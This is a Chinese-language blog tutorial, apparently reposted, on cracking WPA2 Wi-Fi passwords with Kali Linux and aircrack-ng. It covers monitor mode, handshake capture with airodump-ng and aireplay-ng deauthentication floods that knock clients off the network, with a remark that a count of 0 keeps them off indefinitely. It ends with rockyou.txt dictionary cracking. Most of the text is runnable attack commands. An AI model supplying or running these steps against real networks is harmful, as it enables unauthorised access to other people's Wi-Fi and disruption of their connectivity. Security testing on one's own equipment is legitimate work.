当前位置:   article > 正文

kali linux通过aircrack-ng命令破解wifi密码_kali aircrack字典

kali aircrack字典

相关阅读:如何破解攻击WiFi

百度安全验证icon-default.png?t=N7T8https://baijiahao.baidu.com/s?id=1764248756021219497&wfr=spider&for=pc上面2篇文章写得都很不错

一、前期准备工作

1、将无线网卡挂载到Kali上

​ 将无线网卡插到电脑上,如果弹出检测到新的USB设备,就将此设备连接到虚拟机。然后点击虚拟机--->可移动设备--->选择自己的网卡--->连接

image-20220513162708667

可能出现的问题:在可移动设备处无法连接无线网卡;解决:在虚拟机设置中将usb控制器设置成如图所示。注意要先关闭虚拟机在设置。

image-20220513144527731

2、查看是否挂载成功

​ 使用ifconfig命令查看是否存在wlan0网卡,如果不现在可能是未挂载成功或者wlan0网卡不是激活状态

  1. # 显示up状态(激活状态)的网卡信息
  2. ifconfig
  3. # 显示所有网卡的信息,包含未up
  4. ifconfig -a
  5. # 激活wlan0
  6. sudo ifconfig wlan0 10.0.0.100 up

image-20220513143707563

3、查看网卡是否支持监听模式
  1. # 使用su切换root,后面操作基本都需要root权限
  2. su
  3. # 使用airmon-ng查看,如果PYH一栏为null,表示不支持监听模式
  4. airmon-ng
  5. # 如果不支持监听模式请更换无线网卡,或者使用监听驱动
  6. # 参考 https://www.cnblogs.com/answerThe/p/12488477.html ,https://github.com/aircrack-ng?tab=repositories

image-20220513144120181

4、检查文件监听影响并杀死影响
  1. # 检查影响
  2. airmon-ng check
  3. # 杀死影响
  4. airmon-ng check kill

image-20220513144853796

二、网卡监听抓包操作

5、开启无线网卡监听模式
  1. # 开启无线监听,wlan0网卡就是刚刚上面使用ifconfig看到的网卡,开启监听模式后,无线网卡接口wlan0变动为wlan0mon, 能够输入ifconfig进行查看
  2. airmon-ng start wlan0

image-20220513150442797

6、监听周边的WIFI
  1. # 查看周边wifi,注意此时的网卡是wlan0mon,记录需要攻击的目标的BSSID和CH
  2. airodump-ng wlan0mon

image-20220513151758327

7、开始抓包监听
  1. ### 抓包命令,请注意此抓包的shell窗口不要关闭
  2. # 注意此处的shell窗口如果关闭过,抓的包的存储名称会有变化,后面解包时要注意,进入wifitest目录查看.cap的包
  3. # 命令格式:airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0monbssid就是要抓取包的mac地址,信道频率 是CH,)
  4. mkdir wifitest
  5. airodump-ng --bssid A4:39:B3:15:B5:9E -c 3 -w ./wifitest/ wlan0mon
  6. # BSSID: 无线 AP 的硬件地址
  7. # PWR: 信号强度,值是负数,绝对值越小表示信号越强
  8. # CH: 无线网络信道
  9. # ENC: 加密方式,我们要破解的是 WPA2
  10. # ESSID: 无线网络的名称
  11. # BSSID: 无线 AP 的硬件地址
  12. # STATION: 用户设备的硬件地址

image-20220513152916961

8、强制下线重连

实战中以信号最强的为例(PWD为信号强度,越小信号越强),这里我强制我的手机下线重连(mac地址为---> A4:4B:D5:AC:41:7C)

  1. # 新建一个shell窗口进行攻击
  2. aireplay-ng -0 10 -a A4:39:B3:15:B5:9E -c A4:4B:D5:AC:41:7C wlan0mon
  3. # -0 冲突攻击模式,用于使客户端断开与路由器的连接
  4. # 10 为攻击的次数,如果一直跑不出来可以把线程设置大一点。设置为0会无限攻击,导致客户端一直无法连接路由器,请谨慎使用
  5. # -a 路由器mac地址 -c 客户端mac地址
9、成功抓包及原理讲述

​ 握手包抓取原理:当客户端与路由器建立链接进行通信时,会发送包含hash算法加密的密码数据包,也就是握手包。通过软件捕获此数据包,就完成了抓包。如果在抓包期间没有客户端连接路由器的过程,那就不会有握手包的发送,也就无法抓取握手包了,只能期待有新客户端连接路由器,或者原有客户端掉线后重新连接。除了漫长的等待我们还有一种方法,使用aircrack-ng套件的另一个工具aireplay-ng,它可以强制用户掉线并自动连接路由器,这样就有机会抓到握手包了(如果线程设置大的话,就会导致用户一直连不上网)。在airodump-ng抓包过程中,只要有设备连接到路由器,在station栏中找到它们的mac地址,此时重新打开一个终端,输入命令强制用户掉线重连,直至抓包监听的shell窗口出现WPA handshake即表示抓包成功。

image-20220513154530794

三、字典爆破解密

10、结束监听
  1. # 抓包完成后就可以结束监听了,抓的包存储在wifitest目录下,进目录查看是否只有一个.cap的包,如果有多个,可能就是前面抓包时关闭过shell窗口,导致抓取了多个包,需要确定带有密码的包是哪一个,或者都进行爆破
  2. # 在抓包的shell窗口先ctrl+c,再输入下面命令结束监听
  3. airmon-ng stop wlan0mon

image-20220513160051602

11、字典爆破解密
  1. # 先将Kali自带的字典解压,这是1个一千四百多万的大字典,爆破完估计得几天
  2. gzip -d /usr/share/wordlists/rockyou.txt.gz
  3. # 解密 -W 字典路径
  4. aircrack-ng -w /usr/share/wordlists/rockyou.txt ./wifitest/-01.cap

接下来就是漫长的等待,也有可能解密不成功,这就是字典的问题,字典越大,越容易成功,也可在网上下载其他字典

image-20220513160657004

image-20220513162154788

  1. # 这里为了演示效果,就使用自己新建的一个字典解密,我的密码是wang12345,kali那个字典里没有。。。
  2. aircrack-ng ./wifitest/-01.cap -w ./pass.txt

image-20220513161647344

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Guff_9hys/article/detail/957806
推荐阅读
相关标签
  

闽ICP备14008679号